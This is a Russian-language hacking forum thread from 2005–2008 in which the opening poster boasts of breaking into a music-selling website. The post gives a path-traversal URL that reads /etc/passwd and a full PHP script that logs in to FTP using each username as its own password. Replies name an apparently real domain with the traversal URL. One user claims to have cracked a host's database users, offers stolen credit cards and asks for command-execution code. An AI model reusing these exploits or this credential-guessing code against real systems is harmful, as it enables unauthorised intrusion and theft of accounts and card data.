Мой взлом!
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Мой взлом! - 2005-12-03 18:55:01
|
|
|
Gex
Сообщений: 6
Оценки: 0
Присоединился: 2005-11-03 20:15:27
|
Итак! Здравствуйте.Вот взломал сайт и решил поделиться тем, как я его взломал.Ну первым делом я зашёл на сайт. Всё нормально (кстати сайт торговал музыкой). Ничего не нашёл…и вот когда уже уходил, заметил тексты песенокю. А хрен с ним, этим взломом, дай лучше тексты почитаю…читаю…читаю! И тут глаза невольно поднимаются к адресной строке…и что я вижу?
Ссылка выглядила так:http://www.site.com/cgi-bin/view.cgi?pid=song&song=song1_best_2.txtХм! Возможно с помощью этой баги мона читать файлюки на серваке…И так! Пробую http://www.site.com/cgi-bin/view.cgi?pid=song&song=../../../../../../../../../../../etc/passwd И вуоля! Я увидел его содержимое…честно скажу, его содержимое меня поразило! Там начислялось около 100 аккаунтов…Я попробовал тем же макаром прочитать etc/shadow и etc/master.passwd , но ,увы, меня постиг облом…Вот! Ну я и подумал, может есть тут такие ламеры с паролями равными логинам? И забаца скрипт на пхп:<BR><?php <BR>$filename="содержимое etc/passwd"; <BR>$ftp_server="адрес к FTP";//<BR><BR>$fp = fopen ($filename, "r"); <BR><BR>if ($fp) <BR>{ <BR>while (!feof ($fp)) { <BR>$buf = fgets($fp, 100); <BR>ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g); <BR>$ftp_user_name=$g[1]; <BR>$ftp_user_pass=$g[1]; <BR>$conn_id=@ftp_connect($ftp_server); <BR>$login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass); <BR><BR>if (($conn_id) && ($login_result)) <BR>{echo "Connected with login $ftp_user_name<br>"; <BR>ftp_close($conn_id);} <BR>else { <BR>// echo $ftp_user_name." - error<br>"; <BR>} <BR>}} <BR>?> <BR><BR>Залил его к себе на сайт и, указав адреса к файлу и FTP открыл, его…Через 5 минут я посмотрел результат! К моему глубочаёшему удивлению подобралось ЧЕТЫРЕ ламера…Далее я зашёл на их FTP, авторизовался ,и сайт в моём распоряжении.<BR>Кстати я даже ролик снял…
|
|
|
|
|
Мой взлом! - 2005-12-03 23:07:33
|
|
|
Maslo
Сообщений: 717
Оценки: 0
Присоединился: 2005-08-11 21:51:47
|
Молоток.[sm=2.gif]
|
|
|
|
|
Мой взлом! - 2005-12-03 23:40:55
|
|
|
Lex_Voodoo
Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
|
Слава богу, хоть один нормальный человек есть. Прям душа радуется :)
А то только и видишь "Взломайте…", "Помогите…", "Подскажите…" [sm=9.gif]
|
|
|
|
|
Мой взлом! - 2005-12-03 23:58:26
|
|
|
prosto
Сообщений: 125
Оценки: 0
Присоединился: 2005-11-17 01:43:53
|
чел ))) если ты набобахал такой скриптец то я тоже ))) (у меня был скачен с веб-хака вроде..)
|
|
|
|
|
Мой взлом! - 2005-12-04 01:53:24
|
|
|
prosto
Сообщений: 125
Оценки: 0
Присоединился: 2005-11-17 01:43:53
|
Во первых ты не то адресок дал ))) http://www.tropicalstormhawaii.com/cgi-bin/view.cgi?pid=song&song=../../../../../../../../../../../../../etc/passwd
во вторых ты пиз*абол!!! ))) ftp я брутил ))) лол!!!!!!!!!!
|
|
|
|
|
Мой взлом! - 2005-12-04 12:28:25
|
|
|
Maslo
Сообщений: 717
Оценки: 0
Присоединился: 2005-08-11 21:51:47
|
quote:
—————-<BR>Цитата: Дата:04.12.2005 1:53:24, Автор:prosto ::
Во первых ты не то адресок дал ))) http://www.tropicalstormhawaii.com/cgi-bin/view.cgi?pid=song&amp;amp;song=../../../../../../../../../../../../../etc/passwd<BR>во вторых ты пиз*абол!!! ))) ftp я брутил ))) лол!!!!!!!!!!<BR>
—————-
Девочки не ссорьтесь.[sm=1.gif]
|
|
|
|
|
Мой взлом! - 2005-12-05 21:18:01
|
|
|
n1ght
Сообщений: 288
Оценки: 0
Присоединился: 2005-11-12 20:39:41
|
И админам наплевать [sm=2.gif]
|
|
|
|
|
Мой взлом! - 2005-12-05 22:20:24
|
|
|
prosto
Сообщений: 125
Оценки: 0
Присоединился: 2005-11-17 01:43:53
|
целка ты где тут девок увидел…
|
|
|
|
|
Мой взлом! - 2005-12-10 19:49:13
|
|
|
][eaL
Сообщений: 417
Оценки: 0
Присоединился: 2004-03-28 15:47:07
|
Гггг, есть на форуме таланты!=)) Тока для энтава взлома видио снимать - это уже лишнее…
|
|
|
|
|
Мой взлом! - 2005-12-12 23:00:54
|
|
|
udaf-padonok
Сообщений: 17
Оценки: 0
Присоединился: 2005-09-03 01:00:37
|
поделись своей инфой по этому хосту, плиз мне это очень надо
-достал 1 аккаунт к этому хосту логин-пароль работают везде кроме ssh
может там есть какие-нибудь особенности и ты их знаешь?(письмо в службу поддержки)
самое "вкусное" находится в папке /home/php2/cp/user/ ччему соответствует запись в httpd.conf ServerName cp.deep.phpwebhosting.com
но только права там стоят мудренные, наверно в приделах зтих директорий апач выполняется с другими правами
насколько мне стало известно пароли в базе (к аккаунтам) там не закриптованы
Может быть апач выполняется там с правами mysql
насколько мне известно есть возможность исполнять выполнять команды на сервере с правами mysql если известен догин-пароль к базе.
Если кто знаком с этой темой помогите написать скрипт на пхп для этого или дайте готовый код
|
|
|
|
|
Мой взлом! - 2005-12-18 22:31:35
|
|
|
udaf-padonok
Сообщений: 17
Оценки: 0
Присоединился: 2005-09-03 01:00:37
|
Извините за чушь написанную в предыдушем сообщении.
1 на пхп такую прогу написать нельзя
но, то что такая есть это как пить дать
Я имею доступ почти ко всем базам дааннных на сервере, т.к. могу читать таблицу mysqlеще
жаль я могу ее только читать, но я прочитал таблицу с юзерами и разбрутил ее почти всю, но два крутых юзера не поддаются это рут и еще 1 который имеет доступ к базе данных хоста
В базе данных хоста содержатся много интересной инфы(кридитки, пароли к сервисам(в открытом виде))
Помогите мне и я помогу вам(там где-то 300 богатеньких американский юзеров)
Хватит на всех(номеров кредиток, шелов)
Помогите мне узнать что за система там установлена(дистрибутив), что за проц, сколько оперативки и помогите с прогой для исполнения команд с правами mysql(она есть я читал про нее в описании 1 из взломов)
|
|
|
|
|
Мой взлом! - 2005-12-19 19:19:16
|
|
|
chip075
Сообщений: 609
Оценки: 0
Присоединился: 2005-01-28 09:38:59
|
а кнопку изменить сообщение слабо нажать?
|
|
|
|
|
Мой взлом! - 2005-12-19 20:09:36
|
|
|
Benzin
Сообщений: 234
Оценки: 0
Присоединился: 2005-10-31 16:30:25
|
Дак ролик то твой где???
Бороздит просторы вселенной? Раз уш упомянул, так ссылку давай![sm=o.gif]
|
|
|
|
|
Мой взлом! - 2005-12-20 21:17:22
|
|
|
Snifer
Сообщений: 23
Оценки: 0
Присоединился: 2005-11-23 23:18:18
|
A ni kto ni proboval tak "index of\etc" v google vvesti???
mne vse vidolo kokoito stranni cod a che s nim delot ta???
bin:*:2:2: Admin :/bin:
sys:*:3:3: Admin :/usr/src:
adm:*:4:4: Admin :/usr/adm:/sbin/sh
uucp:*:5:5: UUCP Login:/usr/spool/uucp:/usr/lib/uucp/uucico
nuucp:*:5:1: UUCP Admin Login :/usr/lib/uucp:/sbin/sh
ftp:*:200:20: FTP guest Login:/home/ftp:/sbin/sh
nobody:*:65534:65534::/:
mne kachetsa chto u menia tolko razrechenie a ni aroli tak???
|
|
|
|
|
Мой взлом! - 2005-12-20 21:30:07
|
|
|
Python
Сообщений: 4964
Оценки: 0
Присоединился: 2005-12-14 08:32:13
|
Ламер, не ламер…
Неужели это так важно, Gex, кто ламер, а кто нет?.. [sm=7.gif]
|
|
|
|
|
Мой взлом! - 2005-12-20 21:49:31
|
|
|
Snifer
Сообщений: 23
Оценки: 0
Присоединился: 2005-11-23 23:18:18
|
Ludi a vi ne podskachite che s etim dobrom delot???
y menia takogo dobra pol googleka xD
|
|
|
|
|
Мой взлом! - 2005-12-20 21:57:53
|
|
|
Вождь
Сообщений: 559
Оценки: 0
Присоединился: 2005-11-09 17:45:39
|
quote:
—————-<BR>Цитата: Дата:20.12.2005 21:17:22, Автор:Snifer ::
A ni kto ni proboval tak &amp;quot;index ofetc&amp;quot; v google vvesti???<BR><BR>mne vse vidolo kokoito stranni cod a che s nim delot ta???<BR><BR>bin:*:2:2: Admin :/bin: <BR>sys:*:3:3: Admin :/usr/src: <BR>adm:*:4:4: Admin :/usr/adm:/sbin/sh <BR>uucp:*:5:5: UUCP Login:/usr/spool/uucp:/usr/lib/uucp/uucico <BR>nuucp:*:5:1: UUCP Admin Login :/usr/lib/uucp:/sbin/sh <BR>ftp:*:200:20: FTP guest Login:/home/ftp:/sbin/sh <BR>nobody:*:65534:65534::/: <BR><BR>mne kachetsa chto u menia tolko razrechenie a ni aroli tak???
—————-
какое ещё разрешение у тебя? че за разрешение??
если "так" ввести в гугль, то он тебе наверно миллиона 2 ссылок выдаст. Некоторые сайты, по-моему, намеренно директории открытыми оставляют для общего доступа, ну например бесплатные архивы музыки или что-то подобное. Никакими паролями там не пахнет. Точнее может и пахнет;), только выдирать их надо совсем по-другому))
|
|
|
|
|
Мой взлом! - 2005-12-20 22:25:30
|
|
|
Snifer
Сообщений: 23
Оценки: 0
Присоединился: 2005-11-23 23:18:18
|
A v tokom sluchee zachem im eto delot???
I tembolee na sobstvennom servere???
|
|
|
|
|
Мой взлом! - 2005-12-20 22:39:57
|
|
|
Вождь
Сообщений: 559
Оценки: 0
Присоединился: 2005-11-09 17:45:39
|
а хз. А почему бы нет? от этого защита сервера-то не страдает?
|
|
|
|
|
Мой взлом! - 2005-12-20 22:47:49
|
|
|
chip075
Сообщений: 609
Оценки: 0
Присоединился: 2005-01-28 09:38:59
|
ретинг,->реклама->бабло[sm=9.gif]
|
|
|
|
|
Мой взлом! - 2005-12-21 00:34:36
|
|
|
n1ght
Сообщений: 288
Оценки: 0
Присоединился: 2005-11-12 20:39:41
|
quote:
—————-<BR>Цитата: Дата:20.12.2005 22:47:49, Автор:chip075 ::
ретинг,-&amp;gt;реклама-&amp;gt;бабло[sm=9.gif]
—————-
бабло -> бухло -> рейтинг… Знаем мы вас ))) [sm=2.gif]
|
|
|
|
|
Мой взлом! - 2005-12-21 01:15:49
|
|
|
Snifer
Сообщений: 23
Оценки: 0
Присоединился: 2005-11-23 23:18:18
|
A mne tut skazali chto snachala nada zaeditit file shadow pod root prvilegijami chtob rashifrovat paroli[sm=7.gif] odin moi drug sintom nazivajut slijali takova???[sm=sm203.gif]
|
|
|
|
|
Мой взлом! - 2006-03-31 01:22:45
|
|
|
BMXep_DooM
Сообщений: 28
Оценки: 0
Присоединился: 2006-03-12 10:50:12
|
УУУУхххххххтыыыыыыыы!!!как круто-то!!!1 я тоже хачучучучу.научи меня[sm=mad.gif]
мыло дарю HARD_PIRAT@MAIL.RU
|
|
|
|
|
Мой взлом! - 2006-03-31 02:48:40
|
|
|
Smokey
Сообщений: 216
Оценки: 0
Присоединился: 2005-08-14 01:15:48
|
Я поражаюсь, хвалят за взлом[sm=9.gif] Да тут сажать надо![sm=6.gif]
|
|
|
|
|
Мой взлом! - 2006-03-31 04:06:01
|
|
|
Vania
Сообщений: 977
Оценки: 0
Присоединился: 2006-02-17 00:10:32
|
транслит вашу мать….
|
|
|
|
|
Мой взлом! - 2006-04-02 11:59:39
|
|
|
eagleM
Сообщений: 127
Оценки: 0
Присоединился: 2004-12-14 22:43:26
|
quote:
—————-<BR>Цитата: Дата:31.03.2006 1:22:45, Автор:BMXep_DooM ::
УУУУхххххххтыыыыыыыы!!!как круто-то!!!1 я тоже хачучучучу.научи меня[sm=mad.gif]<BR><BR>мыло дарю HARD_PIRAT@MAIL.RU
—————-
Может подаришь мне(хотя нах оно мне нужно). Пароль пришли по личке.
З.Ы. или ты всего лишь разрешил его занести в спам лист?
|
|
|
|
|
Мой взлом! - 2006-04-02 12:02:35
|
|
|
eagleM
Сообщений: 127
Оценки: 0
Присоединился: 2004-12-14 22:43:26
|
Модераторы вы где. Транслит по моемому запрещен правилами форума, а вы даже не возмущаетесь
|
|
|
|
|
Мой взлом! - 2006-04-02 12:13:24
|
|
|
Vania
Сообщений: 977
Оценки: 0
Присоединился: 2006-02-17 00:10:32
|
блин…змей где ты..ползи сюда))
|
|
|
|
|
Мой взлом! - 2006-04-06 10:21:44
|
|
|
killaz
Сообщений: 2
Оценки: 0
Присоединился: 2006-03-29 15:54:48
|
там в начале темы кто-то заикнулся про видео !
где его взять??[sm=1.gif]
|
|
|
|
|
RE: Мой взлом! - 2008-02-24 12:52:47.650000
|
|
|
BugRIPPER
Сообщений: 465
Оценки: 0
Присоединился: 2005-02-18 00:16:04
|
Б\п самый крутой взлом про каторый я когда либо слышал. Изящество и мастеркство аффтора не знает границ. Мега респект и уважуха
|
|
|
|
|
RE: Мой взлом! - 2008-02-24 17:14:13.020000
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
quote:
ORIGINAL: BugRIPPER
Б\п самый крутой взлом про каторый я когда либо слышал. Изящество и мастеркство аффтора не знает границ. Мега респект и уважуха
Ггг убей себя красиво, вот нахера поднимать темы, которые ушли в прошлое несколько лет назад?
|
|
|
|
|
RE: Мой взлом! - 2008-02-24 17:21:32
|
|
|
BugRIPPER
Сообщений: 465
Оценки: 0
Присоединился: 2005-02-18 00:16:04
|
А что ты комплексуешь насчет старых тем?
|
|
|
|
|
RE: Мой взлом! - 2008-02-24 17:36:49.066666
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
Ты олень?
|
|
|
|
|
|
